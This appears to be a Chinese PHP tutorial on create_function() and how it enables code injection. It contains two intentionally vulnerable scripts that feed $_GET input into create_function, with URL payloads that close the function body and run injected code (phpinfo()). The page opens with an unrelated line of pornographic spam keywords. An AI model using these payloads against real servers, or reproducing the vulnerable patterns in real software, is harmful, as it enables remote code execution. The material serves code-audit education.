亚洲乱码中文字幕综合,中国熟女仑乱hd,亚洲精品乱拍国产一区二区三区,一本大道卡一卡二卡三乱码全集资源,又粗又黄又硬又爽的免费视频

PHP create_function()函數(shù)應(yīng)用實(shí)例詳解

 更新時(shí)間:2022年10月08日 15:40:39   作者:snowlyzz  
create_function()函數(shù)在代碼審計(jì)中,主要用來(lái)查找項(xiàng)目中的代碼注入和回調(diào)后門的情況,熟悉了執(zhí)行流程,我們可以熟練的實(shí)現(xiàn)對(duì)代碼注入的payload構(gòu)造,從而進(jìn)行漏洞挖掘和找出存在的缺陷

前言

一直遇到過(guò)這個(gè) 函數(shù),但是不知道怎么利用 這回學(xué)習(xí)一下這個(gè)函數(shù)

create_function()簡(jiǎn)介

適用 PHP4>4.0.1 PHP 5 PHP7

語(yǔ)法:
create_function(string $args,  string $code)
string $args 聲明的函數(shù)變量部分
string $code 執(zhí)行的方法代碼部分

函數(shù)功能

<?php
$newfunc = create_function('$a,$b', 'return "ln($a) + ln($b) = " . log($a * $b);');
echo "New anonymous function: $newfunc\n";
echo $newfunc(2, M_E) . "\n";
?>

分析:

create_function() 會(huì)創(chuàng)造一個(gè)匿名函數(shù) (lambda樣式) 此處創(chuàng)建了一個(gè)叫 lamvda_1 的函數(shù), 在第一個(gè) echo 中 顯示名字, 并在第二個(gè)echo 語(yǔ)句中執(zhí)行了 此函數(shù)。

create_function() 函數(shù) 會(huì)在內(nèi)部 執(zhí)行 eval() , 我們發(fā)現(xiàn)是執(zhí)行了 后面的 return 語(yǔ)句,屬于create_function() 中的第二個(gè)參數(shù) string $code 的位置

因此,上述匿名函數(shù)的創(chuàng)建與執(zhí)行過(guò)程等價(jià)于:

<?php
function lambda_1($a,$b){
    return "ln($a) + ln($b) = " . log($a * $b);
}
?>

create_function( ) 函數(shù)在代碼審計(jì)中,主要用來(lái)查找項(xiàng)目中的代碼注入和回調(diào)后門的情況,熟悉了執(zhí)行流程, 可以實(shí)現(xiàn)對(duì)代碼注入的 payload 構(gòu)造,從而 進(jìn)行漏洞挖掘和找出存在缺陷

代碼注入實(shí)例

0x01

<?php
error_reporting(0);
$sort_by = $_GET['sort_by'];
$sorter = 'strnatcasecmp';
$databases=array('1234','4321');
$sort_function = ' return 1 * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]);';
usort($databases, create_function('$a, $b', $sort_function));
?>

payload:

http://localhost/test1.php?sort_by=%27%22]);}phpinfo();/*

還原實(shí)際的組合過(guò)程:

$sort_function = ' return 1 * ' . $sorter . '($a["' . $sort_by '"]);}phpinfo();/*

匿名函數(shù)實(shí)際的執(zhí)行:

function niming($a,$b){
return 1 * ' . $sorter . '($a["' . $sort_by '"]);}phpinfo();/*
}

$sort_by 是我們傳入的值。

回車換行整理一下:

function niming($a,$b){
return 1 * ' . $sorter . '($a["' . $sort_by '"]);
}
phpinfo();/*
}

0x02

<?php
$c=$_GET['c'];
$lambda=create_function('$a,$b',"return (strlen($a)-strlen($b)+" . "strlen($c));");
$array=array('reall long string here,boy','this','midding lenth','larget');
usort($array,$lambda);
print_r($array);
?>

payload:

http://localhost/test2.php?c=1));}phpinfo();/*

還原實(shí)際的組合過(guò)程:

$lambda=create_function('$a,$b',"return (strlen($a)-strlen($b)+" . "strlen(1));}phpinfo();/*));");

匿名函數(shù)實(shí)際的執(zhí)行:

 function ft($a,$b){
    return (strlen($a)-strlen($b)+" . "strlen(1));}phpinfo();/*));
 }

換行整理:

 function ft($a,$b){
    return (strlen($a)-strlen($b)+" . "strlen(1));
    }
    phpinfo();
    /*));
 }

到此這篇關(guān)于PHP create_function()函數(shù)應(yīng)用實(shí)例詳解的文章就介紹到這了,更多相關(guān)PHP create_function()函數(shù)內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!

相關(guān)文章

最新評(píng)論